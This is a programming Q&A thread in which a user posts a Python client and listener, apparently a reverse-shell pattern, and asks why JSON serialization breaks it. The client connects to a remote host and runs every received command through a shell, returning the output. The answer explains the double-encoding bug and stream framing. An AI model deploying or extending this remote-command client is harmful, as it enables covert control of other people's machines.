# How to convert shell command via input throught socket into json serialize data. e.g: json.dumps and json.loads python 3x

Tags: python, json, sockets

I am trying to run a command remotely via socket connection but when ever I give a command code crashes with a result:
generates subprocess.CalledProcessError: Command '"dir"' returned non-zero exit status 1.

## Client

```
!/usr/bin/env python

import socket
import subprocess
import json


class remote:
    def __init__(self, ip, port):
        self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.connection.connect((ip, port))

    def reliable_send(self, data):
        json_data = json.dumps(data)
        self.connection.send(json_data)

    def reliable_receive(self):
        json_data = json.dumps(self.connection.recv(1024).decode())
        return json.loads(json_data)
        # stuck here! I am trying to create a mkdir via subprocess command. But cannot figure out after this.


    def execute_system_command(self, command):
        return subprocess.check_output(command, shell=True)

    def run(self):
        while True:
            command = self.reliable_receive()
            command_result = self.execute_system_command(command)
            self.reliable_send(command_result)
        connection.close()


my_class = remote("xxx.xxx.xxx.xxx", xxxx)
my_class.run()
```

Objective is to run all the command typed in the server to work in the client. But to manage the large file. Server is trying to put all the received data into Json serialization data via json.dumps and fetch via json.loads. Code works great without serialization.

## Server

```
!/usr/bin/env python

import socket, json


class Listener:
    def __init__(self, ip, port):
       listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
       listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
       listener.bind((ip, port))
       listener.listen(0)
       print("[+] Waiting for incoming connections")
       self.connection, address = listener.accept()
       print("[+] Got connection from " + str(address))

   def reliable_send(self, data):
       json_data = json.dumps(data)
       self.connection.send(json_data)

   def reliable_receive(self):
       json_data = json.dumps(self.connection.recv(1024).decode())
       return json.loads(json_data)

   def execute_remotely(self, command):
       self.reliable_send(command)
       return self.reliable_receive()

   def run(self):
       while True:
           command = raw_input(">> ")
           result = self.execute_remotely(command)
           print(result)


my_listener = Listener("xxx.xxx.xxx.xxx", xxxx)
my_listener.run()
```

Comment: You need to show us the kind of data you receive and which actions you expect to do in response. The code you posted is just a generic server skeleton.

Answer (score 0):

In `reliable_receive`, you’re calling `json.loads` immediately on the result of calling `json.dumps`.  That’s obviously pointless.

In particular, you already called `json.dumps` in `reliable_send`.  More generally, you of course need the same number of dumps and loads; the **imbalance** produced the extra quotes evident in the error message.

The more fundamental issue is that your protocol is **unreliable**: it assumes that messages arrive atomically and separately (never guaranteed by `SOCK_STREAM`, as suggested by the name) and are no longer than 1024 B.  You need to use some form of incremental parsing to recognize the ends of messages.

This could be as simple as appending a null byte to each, since we know that JSON never uses one.  But you still have to receive in a loop until you see one, remove it, and keep any tail past it for the next command.

Comment: @Rick: Stack Overflow is not a code-writing service.  The requisite changes to `reliable_receive` (to address the quoting only, leaving it a misnomer) are sufficiently straightforward that they constitute a good exercise for anyone for whom they are not trivial.

Comment: yes I know there is no end detector but I don't need that for now. I am ok with not receiving all data I just need to make the command work like mkdir, dir etc. It will be nice if you can give me a modified sample for `reliable_receive`